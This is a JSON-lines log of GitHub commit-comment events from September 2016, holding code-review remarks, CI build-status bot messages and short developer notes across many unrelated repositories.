{"id":"4596930338","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115387,"position":null,"line":null,"path":null,"commit_id":"da1b67076ebdcd3f1d9ff1db89e3d2c3ce5cb787","created_at":"2016-09-21T15:15:38Z","updated_at":"2016-09-21T15:15:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1085](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13792&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:15"}},"created_at":"2016-09-21T15:15:38Z"}
{"id":"4596933654","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19115392,"position":null,"line":null,"path":null,"commit_id":"9dd0df81a49aa6e37d787aca356533b5599d472c","created_at":"2016-09-21T15:16:09Z","updated_at":"2016-09-21T15:16:09Z","body":"very good!!!"}},"created_at":"2016-09-21T15:16:09Z"}
{"id":"4596934107","type":"CommitCommentEvent","actor":{"login":"KSXGitHub"},"repo":{"name":"doggybrainguys/bai-lam"},"payload":{"comment":{"id":19115394,"position":null,"line":null,"path":null,"commit_id":"c2a4a5d0bd3ed8c8333da964fbd69cb73b49e62f","created_at":"2016-09-21T15:16:12Z","updated_at":"2016-09-21T15:16:12Z","body":"Làm bậy quá mày ơi!"}},"created_at":"2016-09-21T15:16:12Z"}
{"id":"4596934445","type":"CommitCommentEvent","actor":{"login":"fiona-hall"},"repo":{"name":"fiona-hall/swedishlearning"},"payload":{"comment":{"id":19115395,"position":null,"line":null,"path":null,"commit_id":"b3ec486c8e4e03e506678293f44dda4b6fcc6b43","created_at":"2016-09-21T15:16:16Z","updated_at":"2016-09-21T15:16:16Z","body":"Tack så mycket."}},"created_at":"2016-09-21T15:16:16Z"}
{"id":"4596934960","type":"CommitCommentEvent","actor":{"login":"mohitm86"},"repo":{"name":"Rippling/django-rest-framework-mongoengine"},"payload":{"comment":{"id":19115396,"position":null,"line":null,"path":null,"commit_id":"6a2d859819fd9400a395bdd13ad43e648d884427","created_at":"2016-09-21T15:16:20Z","updated_at":"2016-09-21T15:16:20Z","body":"Cool."}},"created_at":"2016-09-21T15:16:20Z"}
{"id":"4596938495","type":"CommitCommentEvent","actor":{"login":"nataliemueller"},"repo":{"name":"masalmon/fietsen"},"payload":{"comment":{"id":19115406,"position":null,"line":null,"path":null,"commit_id":"812a5bce9b07b79c0f2f5415a28eae3bda357718","created_at":"2016-09-21T15:16:53Z","updated_at":"2016-09-21T15:16:53Z","body":"thank you!\r\nis this for now the final output for cycle path distances until we update one last time?"}},"created_at":"2016-09-21T15:16:53Z"}
{"id":"4596939653","type":"CommitCommentEvent","actor":{"login":"KSXGitHub"},"repo":{"name":"doggybrainguys/bai-lam"},"payload":{"comment":{"id":19115408,"position":42,"line":76,"path":"cpp/2.10.cpp","commit_id":"c2a4a5d0bd3ed8c8333da964fbd69cb73b49e62f","created_at":"2016-09-21T15:17:03Z","updated_at":"2016-09-21T15:17:03Z","body":"`cout <<` struct như thật!"}},"created_at":"2016-09-21T15:17:03Z"}
{"id":"4596940630","type":"CommitCommentEvent","actor":{"login":"KSXGitHub"},"repo":{"name":"doggybrainguys/bai-lam"},"payload":{"comment":{"id":19115410,"position":42,"line":76,"path":"cpp/2.10.cpp","commit_id":"c2a4a5d0bd3ed8c8333da964fbd69cb73b49e62f","created_at":"2016-09-21T15:17:12Z","updated_at":"2016-09-21T15:17:12Z","body":"`cout <<` struct như thật!"}},"created_at":"2016-09-21T15:17:12Z"}
{"id":"4596941389","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115412,"position":24,"line":61,"path":"Anatomy Lab/Managers/MenuItemsManager.swift","commit_id":"da7a4e8d299f665ad62626b9629c9532b526321c","created_at":"2016-09-21T15:17:19Z","updated_at":"2016-09-21T15:17:19Z","body":"You don't need to change this to \"labs\". ```itemsType.rawValue``` returns the value specified in the enum. That also makes ir reusable. This defeats the purpose."}},"created_at":"2016-09-21T15:17:19Z"}
{"id":"4596942720","type":"CommitCommentEvent","actor":{"login":"nataliemueller"},"repo":{"name":"masalmon/fietsen"},"payload":{"comment":{"id":19115415,"position":null,"line":null,"path":null,"commit_id":"812a5bce9b07b79c0f2f5415a28eae3bda357718","created_at":"2016-09-21T15:17:31Z","updated_at":"2016-09-21T15:17:31Z","body":"mainly örebro and rome changed. but that was expected. so great."}},"created_at":"2016-09-21T15:17:31Z"}
{"id":"4596943523","type":"CommitCommentEvent","actor":{"login":"Bkamau"},"repo":{"name":"Bkamau/venda"},"payload":{"comment":{"id":19115419,"position":6,"line":39,"path":"app/src/main/AndroidManifest.xml","commit_id":"e59f489a194b0b2d1ea852b623753bbcd2c72e54","created_at":"2016-09-21T15:17:38Z","updated_at":"2016-09-21T15:17:38Z","body":"needed"}},"created_at":"2016-09-21T15:17:38Z"}
{"id":"4596945270","type":"CommitCommentEvent","actor":{"login":"jeffhuang"},"repo":{"name":"brownhci/Rewind"},"payload":{"comment":{"id":19115424,"position":null,"line":null,"path":null,"commit_id":"4949ef234a3a56a193cc08587b6dfae20d228cb3","created_at":"2016-09-21T15:17:53Z","updated_at":"2016-09-21T15:17:53Z","body":"I think we should actually just remove the yellow background. It's really weird to use alpha = 0.1. It ight feel a bit like \"cheating\" to the reviewers. Not super important though."}},"created_at":"2016-09-21T15:17:53Z"}
{"id":"4596947252","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19115427,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T15:18:10Z","updated_at":"2016-09-21T15:18:10Z","body":"Re: \r\nfrom name_map = _get_name_map(saltenv)\r\nto name_map = get_name_map(saltenv)  and _get_name_map removed.\r\n\r\nWas not part of the original PR change this from the 2016 code.  Can not see any issues with this.\r\n\r\nI am surprised get_name_map is exposed in the 2016 code as its more a internal function...."}},"created_at":"2016-09-21T15:18:10Z"}
{"id":"4596947559","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19115428,"position":null,"line":null,"path":null,"commit_id":"2e4d61f587bc2b5a2f17cc8c3211086f51600ae0","created_at":"2016-09-21T15:18:13Z","updated_at":"2016-09-21T15:18:13Z","body":"Damnit, it's Kaladesh!"}},"created_at":"2016-09-21T15:18:13Z"}
{"id":"4596951954","type":"CommitCommentEvent","actor":{"login":"KSXGitHub"},"repo":{"name":"doggybrainguys/bai-lam"},"payload":{"comment":{"id":19115440,"position":42,"line":76,"path":"cpp/2.10.cpp","commit_id":"c2a4a5d0bd3ed8c8333da964fbd69cb73b49e62f","created_at":"2016-09-21T15:18:50Z","updated_at":"2016-09-21T15:18:50Z","body":"`nguoinhan1`, `nguoinhan2` là struct mà mày `cout << ` như thật!"}},"created_at":"2016-09-21T15:18:50Z"}
{"id":"4596953436","type":"CommitCommentEvent","actor":{"login":"ryantheleach"},"repo":{"name":"pie-flavor/ExampleDataPlugin"},"payload":{"comment":{"id":19115446,"position":24,"line":24,"path":"src/main/java/flavor/pie/example/data/ExampleData.java","commit_id":"dc8f158238bab41c1f8502e6ebeb22dc87e759e5","created_at":"2016-09-21T15:19:03Z","updated_at":"2016-09-21T15:19:03Z","body":"Where is this called? You were telling me on the forums that this needs to be called itself, probably in the constructor."}},"created_at":"2016-09-21T15:19:03Z"}
{"id":"4596958069","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"collective/buildout.plonetest"},"payload":{"comment":{"id":19115456,"position":null,"line":null,"path":null,"commit_id":"664322e0a5f07ba13b30971bfca32d42125db86d","created_at":"2016-09-21T15:19:44Z","updated_at":"2016-09-21T15:19:44Z","body":"@mauritsvanrees can we remove this from all configurations then?"}},"created_at":"2016-09-21T15:19:44Z"}
{"id":"4596962454","type":"CommitCommentEvent","actor":{"login":"cjLinda"},"repo":{"name":"DEIT2014/team7excersie"},"payload":{"comment":{"id":19115467,"position":3,"line":3,"path":"assignment","commit_id":"1f025d2dca0b190c1bc79fab1d330ad581864c1a","created_at":"2016-09-21T15:20:22Z","updated_at":"2016-09-21T15:20:22Z","body":"1.直接定义  var s1 = 'Single quotes work well for string literals.';\r\n            var s2 = \"Double quotes work just as well.\";\r\n2.也可以利用${expression}插入到，前提是expression是个标识符\r\n           var s = 'string interpolation';\r\n           assert('Dart has $s, which is very handy.' ==  'Dart has string interpolation, ' + 'which is very handy.');\r\n3.可以通过邻近的字符串或\"+\"链接字符串  \r\n           var s1 = 'String ' 'concatenation'  \" works even over line breaks.\";\r\n           assert(s1 == 'String concatenation works even over '  'line breaks.');\r\n           var s2 = 'The + operator '   + 'works, as well.';\r\n           assert(s2 == 'The + operator works, as well.');\r\n4.另一个创造多行的字符串可以采用多次引用单个标记符\r\n          var s1 = '''\r\n          You can create\r\n          multi-line strings like this one.\r\n          ''';\r\n5.You can create a “raw” string by prefixing it with r:\r\n          var s = r\"In a raw string, even \\n isn't special.\";\r\n6.// These work in a const string.\r\n          const aConstNum = 0;\r\n          const aConstBool = true;\r\n          const aConstString = 'a constant string';\r\n7.//These do NOT work in a const string.\r\n          var aNum = 0;\r\n          var aBool = true;\r\n          var aString = 'a string';\r\n          const aConstList = const [1, 2, 3];"}},"created_at":"2016-09-21T15:20:22Z"}
{"id":"4596962841","type":"CommitCommentEvent","actor":{"login":"MikeInnes"},"repo":{"name":"JunoLab/atom-julia-client"},"payload":{"comment":{"id":19115468,"position":null,"line":null,"path":null,"commit_id":"945f9391d1fda2d81f5defb5cda0cc5fe47458fb","created_at":"2016-09-21T15:20:26Z","updated_at":"2016-09-21T15:20:26Z","body":"What issue did this cause? This will bring method redefinition warnings back. Although that's less crucial since it looks like 265 will be fixed in Julia 0.6."}},"created_at":"2016-09-21T15:20:26Z"}
{"id":"4596963806","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115474,"position":13,"line":13,"path":"Anatomy Lab/View Controllers/StationTableViewController.swift","commit_id":"b4c9d21577e331284682ed725c0fa4fad11ed214","created_at":"2016-09-21T15:20:35Z","updated_at":"2016-09-21T15:20:35Z","body":"Please use camelCasing to variables and constant names."}},"created_at":"2016-09-21T15:20:35Z"}
{"id":"4596963935","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115475,"position":null,"line":null,"path":null,"commit_id":"531b28ba7e5828b05a2b3bcc6ea90786f9be33bf","created_at":"2016-09-21T15:20:36Z","updated_at":"2016-09-21T15:20:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1086](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13795&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:36"}},"created_at":"2016-09-21T15:20:36Z"}
{"id":"4596969231","type":"CommitCommentEvent","actor":{"login":"ryantheleach"},"repo":{"name":"pie-flavor/ExampleDataPlugin"},"payload":{"comment":{"id":19115486,"position":32,"line":32,"path":"src/main/java/flavor/pie/example/data/ExampleDataBuilder.java","commit_id":"dc8f158238bab41c1f8502e6ebeb22dc87e759e5","created_at":"2016-09-21T15:21:25Z","updated_at":"2016-09-21T15:21:25Z","body":"Doesn't this need more validation?\r\n\r\nAlso it's \"readIDFromDatabase\" ??\r\n\r\nShouldn't this instead read the data from the container using queries?"}},"created_at":"2016-09-21T15:21:25Z"}
{"id":"4596971291","type":"CommitCommentEvent","actor":{"login":"13hsha"},"repo":{"name":"brownhci/Rewind"},"payload":{"comment":{"id":19115490,"position":null,"line":null,"path":null,"commit_id":"4949ef234a3a56a193cc08587b6dfae20d228cb3","created_at":"2016-09-21T15:21:44Z","updated_at":"2016-09-21T15:21:44Z","body":"okie dokie"}},"created_at":"2016-09-21T15:21:44Z"}
{"id":"4596971303","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19115491,"position":27,"line":85,"path":"src/modules/demos.js","commit_id":"f78586d209bb4d7256ff23b0ae158435b5662ea6","created_at":"2016-09-21T15:21:44Z","updated_at":"2016-09-21T15:21:44Z","body":"Okay got it. So what you are storing here might be redundant since it is stored below as `user === logged in user` (line 88 in this same object)\r\n\r\nWhat you would want to do also though, is add another action which adds the newly created user to the redux store's \"users\" array (which currently is only set on `GET_DEMO_SUCCESS` action.\r\n\r\nI suggest (within the saga, prior to `yield put(getAdminData(demoState.guid));`) that you add another call such as \r\n\r\n```\r\nconst user = yield call(api.createUser, demoState.guid); // store whatever is returned from the createuser call\r\nyield put(addUser(user));\r\n```\r\n\r\nand then just create an action similiar to the `GET_DEMO_SUCCESS` one which only pushes the new user to the array.\r\n"}},"created_at":"2016-09-21T15:21:44Z"}
{"id":"4596973277","type":"CommitCommentEvent","actor":{"login":"marceloliveira"},"repo":{"name":"marceloliveira/arcadia-log"},"payload":{"comment":{"id":19115494,"position":null,"line":null,"path":null,"commit_id":"3a2c91a6ec1643ce906e405ff6399e0b4adcc8e1","created_at":"2016-09-21T15:22:02Z","updated_at":"2016-09-21T15:22:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;edwlKuRe&#x2F;1-tela-de-edicao-de-cenario\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Tela de Edição de Cenário</a>"}},"created_at":"2016-09-21T15:22:02Z"}
{"id":"4596977138","type":"CommitCommentEvent","actor":{"login":"pfitzseb"},"repo":{"name":"JunoLab/atom-julia-client"},"payload":{"comment":{"id":19115501,"position":null,"line":null,"path":null,"commit_id":"945f9391d1fda2d81f5defb5cda0cc5fe47458fb","created_at":"2016-09-21T15:22:36Z","updated_at":"2016-09-21T15:22:36Z","body":"[This](https://github.com/JunoLab/atom-julia-client/issues/233) one. We should probably look into makeing the console faster/limit the console cell size/make `bufferLines` faster instead of this, but that's more long term."}},"created_at":"2016-09-21T15:22:36Z"}
{"id":"4596980855","type":"CommitCommentEvent","actor":{"login":"HaNdTriX"},"repo":{"name":"thangngoc89/react-howler"},"payload":{"comment":{"id":19115505,"position":13,"line":13,"path":"src/utils.js","commit_id":"f7e63827542a36af81d2a572eb17db5d355a99c3","created_at":"2016-09-21T15:23:09Z","updated_at":"2016-09-21T15:23:09Z","body":"shouldn't it be `callback()`?"}},"created_at":"2016-09-21T15:23:09Z"}
{"id":"4596981501","type":"CommitCommentEvent","actor":{"login":"mashers"},"repo":{"name":"mashers/3DSafe"},"payload":{"comment":{"id":19115507,"position":null,"line":null,"path":null,"commit_id":"9ea27255af0f5366b6ad4529116f09679c970b51","created_at":"2016-09-21T15:23:15Z","updated_at":"2016-09-21T15:23:15Z","body":"* Moved text display down while entering PIN to prevent text overlap\r\n* Fixed extra characters being displayed when printing entered PIN on the screen"}},"created_at":"2016-09-21T15:23:15Z"}
{"id":"4596982357","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115510,"position":26,"line":31,"path":"Anatomy Lab/View Controllers/GeneralMenuViewController.swift","commit_id":"0c12f7b85f657455e94837fccc023f85d43742b2","created_at":"2016-09-21T15:23:23Z","updated_at":"2016-09-21T15:23:23Z","body":"Never ever use globals. Use closures or delegates to relay information between your classes. This is a bad practice."}},"created_at":"2016-09-21T15:23:23Z"}
{"id":"4596982964","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19115513,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T15:23:28Z","updated_at":"2016-09-21T15:23:28Z","body":"@lots0logs  After this, Now gtk-3.20/gtk.css points `@import url(\"resource:///org/numixproject/gtk-3.20/dist/gtk.css\");` but there is no dist/gtk.css ?"}},"created_at":"2016-09-21T15:23:28Z"}
{"id":"4596985425","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115523,"position":38,"line":94,"path":"Anatomy Lab/View Controllers/GeneralMenuViewController.swift","commit_id":"0c12f7b85f657455e94837fccc023f85d43742b2","created_at":"2016-09-21T15:23:51Z","updated_at":"2016-09-21T15:23:51Z","body":"```self.``` can be omitted here."}},"created_at":"2016-09-21T15:23:51Z"}
{"id":"4596986789","type":"CommitCommentEvent","actor":{"login":"cllns"},"repo":{"name":"hanami/model"},"payload":{"comment":{"id":19115525,"position":27,"line":27,"path":"lib/hanami/model/sql/consoles/abstract.rb","commit_id":"cc3067b89c491953e8e10101b27d283b3efdb3cb","created_at":"2016-09-21T15:24:04Z","updated_at":"2016-09-21T15:24:04Z","body":"Do we need `compact`? `nil.to_s` is any empty string anyway. \r\n\r\nFor example: `[\"a\", nil, 2].join` => `\"a2\"`, which is the same as `[\"a\", nil, 2].compact.join`. \r\n\r\nAnd if we get rid of that, the `concat` helper method might not be needed"}},"created_at":"2016-09-21T15:24:04Z"}
{"id":"4596989319","type":"CommitCommentEvent","actor":{"login":"kongul"},"repo":{"name":"bombarder/skillsupauction"},"payload":{"comment":{"id":19115531,"position":22,"line":22,"path":"auction-service/src/main/java/com/su/auction/service/ItemServiceImpl.java","commit_id":"fa802ca08be08ea01b2bc6c3bedd31db9b864ac1","created_at":"2016-09-21T15:24:26Z","updated_at":"2016-09-21T15:24:26Z","body":"If you want to create the Item? you probably also want to persist in to database. Same with User"}},"created_at":"2016-09-21T15:24:26Z"}
{"id":"4596989387","type":"CommitCommentEvent","actor":{"login":"Atry"},"repo":{"name":"ThoughtWorksInc/Binding.scala"},"payload":{"comment":{"id":19115532,"position":null,"line":null,"path":null,"commit_id":"62d22f8ad3fd750176fd591a893eea328f8cf97e","created_at":"2016-09-21T15:24:27Z","updated_at":"2016-09-21T15:24:27Z","body":"Oh no. The comment is wrong. This test case if for #9 , not #10 ."}},"created_at":"2016-09-21T15:24:27Z"}
{"id":"4596994178","type":"CommitCommentEvent","actor":{"login":"capricorn2001"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":19115540,"position":null,"line":null,"path":null,"commit_id":"f14966b308930fdcbc3bb8fa05fc07d5b09915d7","created_at":"2016-09-21T15:25:12Z","updated_at":"2016-09-21T15:25:12Z","body":"Да, не заметил."}},"created_at":"2016-09-21T15:25:12Z"}
{"id":"4596996298","type":"CommitCommentEvent","actor":{"login":"drj11"},"repo":{"name":"drj11/shell"},"payload":{"comment":{"id":19115549,"position":null,"line":null,"path":null,"commit_id":"9c64a9792e9141c0bd600831d1b7d87c5cb6dbe6","created_at":"2016-09-21T15:25:30Z","updated_at":"2016-09-21T15:25:30Z","body":"In particular \"if the command name is a special built-in or function, variable assignments shall affect the current execution environment\" from http://pubs.opengroup.org/onlinepubs/9699919799/ section 2.9.1"}},"created_at":"2016-09-21T15:25:30Z"}
{"id":"4596997501","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19115552,"position":5,"line":null,"path":"Script/AtomicNET/AtomicNETService/CSComponentInspector.cs","commit_id":"8b66e090812f23b998e1c25329202d6b1fa1574d","created_at":"2016-09-21T15:25:41Z","updated_at":"2016-09-21T15:25:41Z","body":"Dead code."}},"created_at":"2016-09-21T15:25:41Z"}
{"id":"4596998017","type":"CommitCommentEvent","actor":{"login":"sastafford"},"repo":{"name":"sastafford/marklogic-spring-batch"},"payload":{"comment":{"id":19115553,"position":null,"line":null,"path":null,"commit_id":"4aa85d5bb043a9f7691753ae4acf70263340e603","created_at":"2016-09-21T15:25:46Z","updated_at":"2016-09-21T15:25:46Z","body":"@rjrudin - \r\nOne disadvantage is that it looks like a bit like black magic for people not familiar with Spring and it would make these parameters now mandatory.  But I think that's not a huge ask.  \r\n\r\nThe advantage is that it removes a bit of the obfuscation that was hidden away with the AbstractMarkLogicBatchConfig.  Plus, I think using the annotations and the explicit import reference to the MarkLogicBatchConfigurer represents the original intent of Spring Batch job configuration"}},"created_at":"2016-09-21T15:25:46Z"}
{"id":"4597000679","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19115558,"position":null,"line":null,"path":null,"commit_id":"9dd0df81a49aa6e37d787aca356533b5599d472c","created_at":"2016-09-21T15:26:10Z","updated_at":"2016-09-21T15:26:10Z","body":"Indeed it is, I was lucky to find these opcodes."}},"created_at":"2016-09-21T15:26:10Z"}
{"id":"4597002564","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19115562,"position":null,"line":null,"path":null,"commit_id":"bec41cfbb0b049fef05e697446ff38f73f808e92","created_at":"2016-09-21T15:26:26Z","updated_at":"2016-09-21T15:26:26Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MReTWX5M&#x2F;20-tester-le-chargement-du-jeu-named-entity\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> tester le chargement du jeu : named-entity</a>"}},"created_at":"2016-09-21T15:26:26Z"}
{"id":"4597003840","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"collective/buildout.plonetest"},"payload":{"comment":{"id":19115565,"position":null,"line":null,"path":null,"commit_id":"664322e0a5f07ba13b30971bfca32d42125db86d","created_at":"2016-09-21T15:26:38Z","updated_at":"2016-09-21T15:26:38Z","body":"No.  In zc.buildout 1.x the default is `unzip = false`. So if we remove it everywhere, it will lead to changes.\r\nWhether that really causes problems is anyone's guess."}},"created_at":"2016-09-21T15:26:38Z"}
{"id":"4597006354","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115570,"position":55,"line":114,"path":"Anatomy Lab/View Controllers/GeneralMenuViewController.swift","commit_id":"0c12f7b85f657455e94837fccc023f85d43742b2","created_at":"2016-09-21T15:27:02Z","updated_at":"2016-09-21T15:27:02Z","body":"You can change ```var``` for ```let``` since you won't be altering the variable, it can be a constant.\r\n\r\nAnd you can avoid unwrapping optionals (as!) and check for failure before doing anything, like this:\r\n\r\n```\r\nif let vc = segue.destinationViewController as? UIViewController {\r\n    vc.popoverPresentationController.controller?.delegate = self\r\n}\r\n```"}},"created_at":"2016-09-21T15:27:02Z"}
{"id":"4597006579","type":"CommitCommentEvent","actor":{"login":"BradyLiles"},"repo":{"name":"BradyLiles/selectize.js"},"payload":{"comment":{"id":19115571,"position":202,"line":2196,"path":"src/selectize.js","commit_id":"9d953d765cb4c89428929245afea17e7a8f259d5","created_at":"2016-09-21T15:27:04Z","updated_at":"2016-09-21T15:27:04Z","body":"temp fix on cache issue"}},"created_at":"2016-09-21T15:27:04Z"}
{"id":"4597010126","type":"CommitCommentEvent","actor":{"login":"MikeInnes"},"repo":{"name":"JunoLab/atom-julia-client"},"payload":{"comment":{"id":19115574,"position":null,"line":null,"path":null,"commit_id":"945f9391d1fda2d81f5defb5cda0cc5fe47458fb","created_at":"2016-09-21T15:27:34Z","updated_at":"2016-09-21T15:27:34Z","body":"I'm a bit surprised that this is causing a performance issue, but if it bugs me I'm sure I'll investigate."}},"created_at":"2016-09-21T15:27:34Z"}
{"id":"4597011054","type":"CommitCommentEvent","actor":{"login":"Cavayman"},"repo":{"name":"NazDov/myosbb"},"payload":{"comment":{"id":19115578,"position":null,"line":null,"path":null,"commit_id":"23fa2ee14788962b849fc262460e575828860c82","created_at":"2016-09-21T15:27:43Z","updated_at":"2016-09-21T15:27:43Z","body":"Nice) "}},"created_at":"2016-09-21T15:27:43Z"}
{"id":"4597011417","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19115579,"position":5,"line":null,"path":"Script/AtomicNET/AtomicNETService/CSComponentInspector.cs","commit_id":"8b66e090812f23b998e1c25329202d6b1fa1574d","created_at":"2016-09-21T15:27:46Z","updated_at":"2016-09-21T15:27:46Z","body":"This is a log by josh, I assume for debugging purposes, but it's really spammy so commented out. Will add a note about it when I next touch the code (have a change in my todo list)\r\n"}},"created_at":"2016-09-21T15:27:46Z"}
{"id":"4597012200","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19115582,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-21T15:27:53Z","updated_at":"2016-09-21T15:27:53Z","body":"121784677-OAControllerFixes4633 (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T15:27:53Z"}
{"id":"4597013475","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19115584,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T15:28:06Z","updated_at":"2016-09-21T15:28:06Z","body":"@lots0logs May be Utils script needs modifying. It is not copying the actual gtk.css"}},"created_at":"2016-09-21T15:28:06Z"}
{"id":"4597017714","type":"CommitCommentEvent","actor":{"login":"vantu5z"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":19115589,"position":null,"line":null,"path":null,"commit_id":"f14966b308930fdcbc3bb8fa05fc07d5b09915d7","created_at":"2016-09-21T15:28:43Z","updated_at":"2016-09-21T15:28:43Z","body":"Ты тест запускай перед тем как залить изменения и все будет гуд ;)"}},"created_at":"2016-09-21T15:28:43Z"}
{"id":"4597019680","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115593,"position":21,"line":45,"path":"Anatomy Lab.xcodeproj/project.pbxproj","commit_id":"9382f0562827cc7fca5a881ed6771ed369f52a98","created_at":"2016-09-21T15:29:02Z","updated_at":"2016-09-21T15:29:02Z","body":"Please avoid hardcoding paths to project assets. If I merge this, this will break the project since its hardcoded to a path in your machine."}},"created_at":"2016-09-21T15:29:02Z"}
{"id":"4597020434","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115596,"position":47,"line":376,"path":"Anatomy Lab.xcodeproj/project.pbxproj","commit_id":"9382f0562827cc7fca5a881ed6771ed369f52a98","created_at":"2016-09-21T15:29:09Z","updated_at":"2016-09-21T15:29:09Z","body":"Same as before."}},"created_at":"2016-09-21T15:29:09Z"}
{"id":"4597021096","type":"CommitCommentEvent","actor":{"login":"zentraedi"},"repo":{"name":"FIU-SCIS-Senior-Projects/Technology-Driven-Active-Learning-in-Human-Anatomy-Laboratory-Ver-1.0"},"payload":{"comment":{"id":19115600,"position":58,"line":385,"path":"Anatomy Lab.xcodeproj/project.pbxproj","commit_id":"9382f0562827cc7fca5a881ed6771ed369f52a98","created_at":"2016-09-21T15:29:15Z","updated_at":"2016-09-21T15:29:15Z","body":"Same as before."}},"created_at":"2016-09-21T15:29:15Z"}
{"id":"4597026155","type":"CommitCommentEvent","actor":{"login":"rsudev"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19115616,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-21T15:30:00Z","updated_at":"2016-09-21T15:30:00Z","body":"IIRC there is some possibility to say I want the search result starting at index 'x', but I am currently on vacation, so I can search for it only next week."}},"created_at":"2016-09-21T15:30:00Z"}
{"id":"4597028603","type":"CommitCommentEvent","actor":{"login":"masalmon"},"repo":{"name":"masalmon/fietsen"},"payload":{"comment":{"id":19115621,"position":null,"line":null,"path":null,"commit_id":"812a5bce9b07b79c0f2f5415a28eae3bda357718","created_at":"2016-09-21T15:30:21Z","updated_at":"2016-09-21T15:30:21Z","body":"Well we should update once again in a few weeks maybe but these are distances with the right boundaries ☺"}},"created_at":"2016-09-21T15:30:21Z"}
